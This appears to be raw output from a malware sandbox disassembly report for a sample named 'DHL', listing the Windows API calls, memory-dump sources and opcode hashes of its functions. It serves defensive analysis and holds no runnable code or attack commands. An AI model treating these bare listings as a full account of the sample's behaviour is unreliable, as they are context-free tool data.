                                                        • _wcslen.LIBCMT ref: 00A0D01B
                                                        • SHFileOperationW.SHELL32(?), ref: 00A0D061
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                        • String ID: \*.*
                                                        • API String ID: 3164238972-1173974218
                                                        • Opcode ID: d8a05c65875bf740bffbce9fdfee695633a50a6e58da9c7efc14750463b34e80
                                                        • Instruction ID: 2a3098210fb9efd9ce7d0f0e3062f0a34332b0c3d838f39f6a7949a7c0dccd48
                                                        • Opcode Fuzzy Hash: d8a05c65875bf740bffbce9fdfee695633a50a6e58da9c7efc14750463b34e80
                                                        • Instruction Fuzzy Hash: 8A4155B190521D5FDF12EFA4ED81FDEB7B8AF48790F0000E6E505EB182EA34AA44CB51
                                                        APIs
                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00A32E1C
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00A32E4F
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00A32E84
                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00A32EB6
                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00A32EE0
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00A32EF1
                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00A32F0B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: LongWindow$MessageSend
                                                        • String ID:
                                                        • API String ID: 2178440468-0
                                                        • Opcode ID: 52dac29a4d14054157c640457351fece0acc22d66eb37fb85e6b828f96c22095
                                                        • Instruction ID: 3e51d391bf3a68d31dc43f3635de1ada5c761382576181b623419e1e6f026553
                                                        • Opcode Fuzzy Hash: 52dac29a4d14054157c640457351fece0acc22d66eb37fb85e6b828f96c22095
                                                        • Instruction Fuzzy Hash: 17313731644250AFDB20CF98DC86F653BE0FB8A720F245164FA049F2B1CB75AC82DB40
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A07769
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A0778F
                                                        • SysAllocString.OLEAUT32(00000000), ref: 00A07792
                                                        • SysAllocString.OLEAUT32(?), ref: 00A077B0
                                                        • SysFreeString.OLEAUT32(?), ref: 00A077B9
                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00A077DE
                                                        • SysAllocString.OLEAUT32(?), ref: 00A077EC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                        • String ID:
                                                        • API String ID: 3761583154-0
                                                        • Opcode ID: d9d26619807b935771f62d687d49e478863345fc296d3e4a822f672e86bdad0b
                                                        • Instruction ID: 343a3e0531983af7d25c6f4bc3b2fa99731221364674ade6c9d5fe325792464f
                                                        • Opcode Fuzzy Hash: d9d26619807b935771f62d687d49e478863345fc296d3e4a822f672e86bdad0b
                                                        • Instruction Fuzzy Hash: FA21A176A0421DAFDF10DFA8DC88DBF77ACEB097A4B048025FA15DB191D670ED428760
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A07842
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A07868
                                                        • SysAllocString.OLEAUT32(00000000), ref: 00A0786B
                                                        • SysAllocString.OLEAUT32 ref: 00A0788C
                                                        • SysFreeString.OLEAUT32 ref: 00A07895
                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00A078AF
                                                        • SysAllocString.OLEAUT32(?), ref: 00A078BD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                        • String ID:
                                                        • API String ID: 3761583154-0
                                                        • Opcode ID: b60ce9907ce95b27260f5be0534e4ee1f9b635ef2fc767c842d9481c4d33ebe4
                                                        • Instruction ID: fe24e401e6df94ae2809b20de056f2d78926e62aaddde3c6bf1d33797312b7e0
                                                        • Opcode Fuzzy Hash: b60ce9907ce95b27260f5be0534e4ee1f9b635ef2fc767c842d9481c4d33ebe4
                                                        • Instruction Fuzzy Hash: 44216232A04208AFDB10DFE8DC8DDAE77ACEB097607108125F915DB2A1D674EC85CB64
                                                        APIs
                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00A104F2
                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A1052E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: CreateHandlePipe
                                                        • String ID: nul
                                                        • API String ID: 1424370930-2873401336
                                                        • Opcode ID: 22368dd3a169b94c02cdb44913bfb776dfbb83af817e83d0e81276ac016317c4
                                                        • Instruction ID: 55fb6efa740a14525d6b50c8109f6211ae5f7b9a7660d1fa7ac178b22f282c99
                                                        • Opcode Fuzzy Hash: 22368dd3a169b94c02cdb44913bfb776dfbb83af817e83d0e81276ac016317c4
                                                        • Instruction Fuzzy Hash: EA213D75500305ABDB209F69DC44EDABBB6BF54774F208A19F8A1E62E0D7B099D1CF20
                                                        APIs
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00A105C6
                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A10601
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: CreateHandlePipe
                                                        • String ID: nul
                                                        • API String ID: 1424370930-2873401336
                                                        • Opcode ID: 225e81c61c06bad161fba7f1082e8e971d80f5c37a1cb6e100e65e70bb3c7ec9
                                                        • Instruction ID: 8826c42897749b1fd5489450f4ddac54a5cbc958492cd726a39ab297389bc590
                                                        • Opcode Fuzzy Hash: 225e81c61c06bad161fba7f1082e8e971d80f5c37a1cb6e100e65e70bb3c7ec9
                                                        • Instruction Fuzzy Hash: 5E2141755003059BDB209FA99C44EDAB7A5AF95730F204A19F8B1E72D0D7F099E1CB50
                                                        APIs
                                                          • Part of subcall function 009A600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 009A604C
                                                          • Part of subcall function 009A600E: GetStockObject.GDI32(00000011), ref: 009A6060
                                                          • Part of subcall function 009A600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 009A606A
                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00A34112
                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00A3411F
                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00A3412A
                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00A34139
                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00A34145
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                        • String ID: Msctls_Progress32
                                                        • API String ID: 1025951953-3636473452
                                                        • Opcode ID: cc1c761aeb1ea25bd7f1c1ccd2c6a36c227e7d8501ee5ea41f05d0c1a90eb15b
                                                        • Instruction ID: f60045719e1b91ada02b55eb46e2d116d543e9099de59852e6967dd3f760e915
                                                        • Opcode Fuzzy Hash: cc1c761aeb1ea25bd7f1c1ccd2c6a36c227e7d8501ee5ea41f05d0c1a90eb15b
                                                        • Instruction Fuzzy Hash: 8C11B2B2150219BEEF118FA4CC86EE77FADEF09798F014111FA18A2050CB769C61DBA4
                                                        APIs
                                                          • Part of subcall function 009DD7A3: _free.LIBCMT ref: 009DD7CC
                                                        • _free.LIBCMT ref: 009DD82D
                                                          • Part of subcall function 009D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009DD7D1,00000000,00000000,00000000,00000000,?,009DD7F8,00000000,00000007,00000000,?,009DDBF5,00000000), ref: 009D29DE
                                                          • Part of subcall function 009D29C8: GetLastError.KERNEL32(00000000,?,009DD7D1,00000000,00000000,00000000,00000000,?,009DD7F8,00000000,00000007,00000000,?,009DDBF5,00000000,00000000), ref: 009D29F0
                                                        • _free.LIBCMT ref: 009DD838
                                                        • _free.LIBCMT ref: 009DD843
                                                        • _free.LIBCMT ref: 009DD897
                                                        • _free.LIBCMT ref: 009DD8A2
                                                        • _free.LIBCMT ref: 009DD8AD
                                                        • _free.LIBCMT ref: 009DD8B8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                        • Instruction ID: 5cd90b801f3497e71f8588e03df04e79a25cc8f57ab9715de7d39b59ba3cf581
                                                        • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                        • Instruction Fuzzy Hash: 0E1151B15C2B04AAE521BFB0CC47FCB7BDC6F90700F408826B29DB6292DA65B5055650
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00A0DA74
                                                        • LoadStringW.USER32(00000000), ref: 00A0DA7B
                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00A0DA91
                                                        • LoadStringW.USER32(00000000), ref: 00A0DA98
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00A0DADC
                                                        Strings
                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00A0DAB9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadModuleString$Message
                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                        • API String ID: 4072794657-3128320259
                                                        • Opcode ID: 028ac7f3235e13422ad8005d92bd46da7a68958d35e243c819efbca7c1021060
                                                        • Instruction ID: 0091e666dbf850dfda22409f8c4b2214c301dfd11194fb77b4cb17946022a2f7
                                                        • Opcode Fuzzy Hash: 028ac7f3235e13422ad8005d92bd46da7a68958d35e243c819efbca7c1021060
                                                        • Instruction Fuzzy Hash: F80162F35002087FE710DBE09D89EE7726CE708311F400595B706F2082EA749E854F74
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(00D93838,00D93838), ref: 00A1097B
                                                        • EnterCriticalSection.KERNEL32(00D93818,00000000), ref: 00A1098D
                                                        • TerminateThread.KERNEL32(00000000,000001F6), ref: 00A1099B
                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00A109A9
                                                        • CloseHandle.KERNEL32(00000000), ref: 00A109B8
                                                        • InterlockedExchange.KERNEL32(00D93838,000001F6), ref: 00A109C8
                                                        • LeaveCriticalSection.KERNEL32(00D93818), ref: 00A109CF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                        • String ID:
                                                        • API String ID: 3495660284-0
                                                        • Opcode ID: f20ae8fc21e9f73c60c673fdeab8d3f080ee9a0c6a15e8232060466ecfb5ec99
                                                        • Instruction ID: a876e938b287de502ddaa7d13f35e39ea88e0d50e04f5eef2f8f67d842c3c0cd
                                                        • Opcode Fuzzy Hash: f20ae8fc21e9f73c60c673fdeab8d3f080ee9a0c6a15e8232060466ecfb5ec99
                                                        • Instruction Fuzzy Hash: EEF03131442512BBD741AFD4EE8CBD6BB35FF05712F401015F201608A1C7B494B6CF90
                                                        APIs
                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00A21DC0
                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00A21DE1
                                                        • WSAGetLastError.WSOCK32 ref: 00A21DF2
                                                        • htons.WSOCK32(?,?,?,?,?), ref: 00A21EDB
                                                        • inet_ntoa.WSOCK32(?), ref: 00A21E8C
                                                          • Part of subcall function 00A039E8: _strlen.LIBCMT ref: 00A039F2
                                                          • Part of subcall function 00A23224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00A1EC0C), ref: 00A23240
                                                        • _strlen.LIBCMT ref: 00A21F35
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                        • String ID:
                                                        • API String ID: 3203458085-0
                                                        • Opcode ID: e3096a3e6a367a5fc89e749812a16202949513eee8a1fd29dff247d42705ac10
                                                        • Instruction ID: 265261565ba04c909d8bb7fdd20cc8f97ae44a742a2c56796153900cb3582a36
                                                        • Opcode Fuzzy Hash: e3096a3e6a367a5fc89e749812a16202949513eee8a1fd29dff247d42705ac10
                                                        • Instruction Fuzzy Hash: 1CB1CF31604310AFC324DF28D895F2A77A5AFD5318F54896CF46A5B2E2DB31ED42CB91
                                                        APIs
                                                        • GetClientRect.USER32(?,?), ref: 009A5D30
                                                        • GetWindowRect.USER32(?,?), ref: 009A5D71
                                                        • ScreenToClient.USER32(?,?), ref: 009A5D99
                                                        • GetClientRect.USER32(?,?), ref: 009A5ED7
                                                        • GetWindowRect.USER32(?,?), ref: 009A5EF8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Rect$Client$Window$Screen
                                                        • String ID:
                                                        • API String ID: 1296646539-0
                                                        • Opcode ID: d7068681ec39f0d39093712e02c6ad5f9352ac7e8444343b0beec742d225d0a9
                                                        • Instruction ID: 35a7e6411bcf0bc40a9395623689df7084dcd81b6ee764bdd97132fabfa4f580
                                                        • Opcode Fuzzy Hash: d7068681ec39f0d39093712e02c6ad5f9352ac7e8444343b0beec742d225d0a9
                                                        • Instruction Fuzzy Hash: 90B19D34A0078AEBDB10CFA9C4407EEB7F5FF58310F14881AE8A9D7250D734AA51DB90
                                                        APIs
                                                        • __allrem.LIBCMT ref: 009D00BA
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009D00D6
                                                        • __allrem.LIBCMT ref: 009D00ED
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009D010B
                                                        • __allrem.LIBCMT ref: 009D0122
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009D0140
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                        • String ID:
                                                        • API String ID: 1992179935-0
                                                        • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                        • Instruction ID: 6e449b314ae05e6937b7d4d798190c3b2830b226db762e66fcd799562b1fcf37
                                                        • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                        • Instruction Fuzzy Hash: 3F81E272A40706ABE720AB69CC51B6AB3A9EFC1364F24853FF551D7781E770DA008B91
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,009C82D9,009C82D9,?,?,?,009D644F,00000001,00000001,8BE85006), ref: 009D6258
                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,009D644F,00000001,00000001,8BE85006,?,?,?), ref: 009D62DE
                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 009D63D8
                                                        • __freea.LIBCMT ref: 009D63E5
                                                          • Part of subcall function 009D3820: RtlAllocateHeap.NTDLL(00000000,?,00A71444,?,009BFDF5,?,?,009AA976,00000010,00A71440,009A13FC,?,009A13C6,?,009A1129), ref: 009D3852
                                                        • __freea.LIBCMT ref: 009D63EE
                                                        • __freea.LIBCMT ref: 009D6413
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1414292761-0
                                                        • Opcode ID: 203a99c1f042c14e57fea37d79171cc7ac6e56d3f42bda9b9f918157ac8cc8bc
                                                        • Instruction ID: 26dd41b28d96eb2ada58c92bfd57fd80d66902774b103555a472f9ec461cc7c3
                                                        • Opcode Fuzzy Hash: 203a99c1f042c14e57fea37d79171cc7ac6e56d3f42bda9b9f918157ac8cc8bc
                                                        • Instruction Fuzzy Hash: 0751E172A40216ABDB258FA4CC81FBFB7A9EB84750F15C72AFD05D6241DB34DC40D660
                                                        APIs
                                                          • Part of subcall function 009A9CB3: _wcslen.LIBCMT ref: 009A9CBD
                                                          • Part of subcall function 00A2C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A2B6AE,?,?), ref: 00A2C9B5
                                                          • Part of subcall function 00A2C998: _wcslen.LIBCMT ref: 00A2C9F1
                                                          • Part of subcall function 00A2C998: _wcslen.LIBCMT ref: 00A2CA68
                                                          • Part of subcall function 00A2C998: _wcslen.LIBCMT ref: 00A2CA9E
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A2BCCA
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A2BD25
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00A2BD6A
                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00A2BD99
                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00A2BDF3
                                                        • RegCloseKey.ADVAPI32(?), ref: 00A2BDFF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                        • String ID:
                                                        • API String ID: 1120388591-0
